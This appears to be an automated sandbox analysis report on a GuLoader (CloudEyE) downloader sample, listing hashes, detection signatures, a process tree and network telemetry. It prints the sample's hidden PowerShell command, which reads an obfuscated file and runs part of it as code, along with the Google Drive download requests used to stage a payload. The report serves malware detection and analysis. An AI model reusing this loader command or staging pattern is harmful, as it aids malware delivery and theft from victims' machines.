

Windows Analysis Report
AM983ebb5F.exe

Overview

General Information

Sample name: AM983ebb5F.exe (renamed because the original name is a hash value)
Original sample name: d7e1f00ddf7e5b61046566992a771ff1ae5b99ac2df6c906b7cde3d24c611875.exe
Analysis ID: 1588781
MD5: 03abc55b8081dadf39d55ebd481bef1c
SHA1: 9b7da36f4fed678308ed8f88bb0ae9797969f8f5
SHA256: d7e1f00ddf7e5b61046566992a771ff1ae5b99ac2df6c906b7cde3d24c611875
Tags: exe, user-adrian__luca

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • AM983ebb5F.exe (PID: 6640 cmdline: "C:\Users\user\Desktop\AM983ebb5F.exe" MD5: 03ABC55B8081DADF39D55EBD481BEF1C)
    • powershell.exe (PID: 6988 cmdline: powershell.exe -windowstyle hidden "$Celeries=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor';$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Anthranil.exe (PID: 6660 cmdline: "C:\Users\user\AppData\Local\Temp\Anthranil.exe" MD5: 03ABC55B8081DADF39D55EBD481BEF1C)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: (empty)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 00000006.00000002.3009478955.000000000363A000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security
Strings: (empty)

    System Summary

    Source: Process started
    Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
    Data:
      Command: powershell.exe -windowstyle hidden "$Celeries=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor';$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) "
      CommandLine: powershell.exe -windowstyle hidden "$Celeries=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor';$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) "
      CommandLine|base64offset|contains: v,)^
      Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      ParentCommandLine: "C:\Users\user\Desktop\AM983ebb5F.exe"
      ParentImage: C:\Users\user\Desktop\AM983ebb5F.exe
      ParentProcessId: 6640
      ParentProcessName: AM983ebb5F.exe
      ProcessCommandLine: powershell.exe -windowstyle hidden "$Celeries=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor';$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) "
      ProcessId: 6988
      ProcessName: powershell.exe
    Timestamp: 2025-01-11T05:29:32.250610+0100
    SID: 2803270
    Severity: 2
    Classtype: Potentially Bad Traffic
    Source IP: 192.168.2.4
    Source Port: 49202
    Destination IP: 216.58.206.46
    Destination Port: 443
    Protocol: TCP



    AV Detection

    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe, ReversingLabs: Detection: 50%
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exe, Virustotal: Detection: 69%
    Source: AM983ebb5F.exe, ReversingLabs: Detection: 50%
    Source: AM983ebb5F.exe, Virustotal: Detection: 69%
    Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
    Source: AM983ebb5F.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49202 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49209 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49251 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49268 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49283 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49314 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49324 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49326 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49328 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49330 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49332 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49334 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49336 version: TLS 1.2
    Source: AM983ebb5F.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: Anthranil.exe, 00000006.00000001.2413832004.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: Binary string: mshtml.pdbUGP source: Anthranil.exe, 00000006.00000001.2413832004.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: C:\Users\user\Desktop\AM983ebb5F.exe, Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C63
    Source: C:\Users\user\Desktop\AM983ebb5F.exe, Code function: 0_2_004068B4 FindFirstFileW,FindClose, 0_2_004068B4
    Source: C:\Users\user\Desktop\AM983ebb5F.exe, Code function: 0_2_00402910 FindFirstFileW, 0_2_00402910
    Source: global traffic, TCP traffic: 192.168.2.4:65412 -> 162.159.36.2:53
    Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49202 -> 216.58.206.46:443
    Source: global traffic, HTTP traffic detected:
      GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
      Host: drive.google.com
      Cache-Control: no-cache
    Source: global traffic, HTTP traffic detected:
      GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
      Cache-Control: no-cache
      Host: drive.usercontent.google.com
      Connection: Keep-Alive
    Source: global traffic, HTTP traffic detected:
      GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
      Host: drive.google.com
      Cache-Control: no-cache
      Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global traffic, HTTP traffic detected:
      GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
      Cache-Control: no-cache
      Host: drive.usercontent.google.com
      Connection: Keep-Alive
      Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: unknown, TCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global traffic  DNS traffic detected: DNS query: drive.google.com
    Source: global traffic  DNS traffic detected: DNS query: drive.usercontent.google.com
    Source: global traffic  HTTP traffic detected: HTTP/1.1 404 Not Found (13 responses between 04:29:33 and 04:30:00 on Sat, 11 Jan 2025; every response carries the header set shown for the first one, in varying order, and differs only in Date, X-GUploader-UploadID and the script-src nonce; only the first response also sent P3P and Set-Cookie):
        HTTP/1.1 404 Not Found
        X-GUploader-UploadID: AFIdbgTBooCx_HrtJC3dg5lWi0qpxqYt1SJrNXd72GCuoigbkGjPBUDAxsHkQUQpyZECnBog
        Content-Type: text/html; charset=utf-8
        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
        Pragma: no-cache
        Expires: Mon, 01 Jan 1990 00:00:00 GMT
        Date: Sat, 11 Jan 2025 04:29:33 GMT
        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
        Cross-Origin-Opener-Policy: same-origin
        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
        Content-Security-Policy: script-src 'nonce-wFy2sGQAm2wSFVrYWoRwbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
        Content-Length: 1652
        Server: UploadServer
        Set-Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb; expires=Sun, 13-Jul-2025 04:29:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        Content-Security-Policy: sandbox allow-scripts
        Connection: close
    Per-response values (Date, X-GUploader-UploadID, script-src nonce):
        04:29:33  AFIdbgTBooCx_HrtJC3dg5lWi0qpxqYt1SJrNXd72GCuoigbkGjPBUDAxsHkQUQpyZECnBog  wFy2sGQAm2wSFVrYWoRwbQ
        04:29:35  AFIdbgRzeassAPrPqTtDI0EaN8RC2ufu6O8jkL6XiWWcIWXfkChYAV2RGftzfisi6M0ihpBrV-sZs4U  aXNXIr4DnQiNWYCr3ejh7Q
        04:29:37  AFIdbgTZdeheKZn9JVpZuacOi6ApEAGnQOQGB0gK8y9XyaH5NkKrKYsmI5h_vm5TG_rcdgXTSii4tGg  ngv22eOXnR0dwv_YGuvWuQ
        04:29:40  AFIdbgQyxB9-iB40u7xrRo_i8LHwzV7razK3VC4IJhk7L9XqBSadW9jYGCJqeFUofnNPSDnqFQ-iMQM  tcqYqqwChqFINUHZo3dYOg
        04:29:42  AFIdbgT8zNwOpOZgE9eOuW7XP3yy5L6Y7NFcyKxKAd1nJKL_EmSex-Plm-rFbF1E2LQU9zeJ  JN5pSnM8jJiEbYm1SGdy6A
        04:29:44  AFIdbgQ3yQOrHQMalSwG_0AIfhTxgG81HYZADqgy2dDO4AfOELtZVX21LHohl1INOqm5E3eE_RAy7eE  sCQUuUjZhEpY9O8Zx7PTeg
        04:29:46  AFIdbgShivJ69ND35w3dJbu-kfuHY7HPtA2vpk3iP5ROtaXYfaeRrStXnKamEOy7XPkQyZfk5ENd6SE  7KwAU09EzDaMcOyRvIx1lQ
        04:29:49  AFIdbgSeH1dNT61mN-VS3GHaYMELFq-9LTWkLHSh2GgvkPyB2eTqFfnXyp6lVVhAi4UWmy1T  4qJZgdpT07Uuhd1uYITnuw
        04:29:51  AFIdbgRCCopv9kcEaAbDGGMxs6w84S9siUxAMjN4r7LgbOLjQavjH8APpCnyk2R5pzZMJghN  fvsjmTXeHKtqQjIn6RSq5w
        04:29:53  AFIdbgTO5zPYZIhjM4ikLP9B8xuEOay9YnrXi71GJvViiT33y4MN_kz4N7sJd55KcRJGB1qc  jr1iZeOWVIKXrfKJpGwY-w
        04:29:56  AFIdbgTtEnrvsYf6N4wH7Tn1wvfpdoYW8SZCyEH0v86h4nPr5AInCNFwyEsq1Ry2hn5-Xv1XFzfZ5TY  LMZkefaX489A_cu248nRag
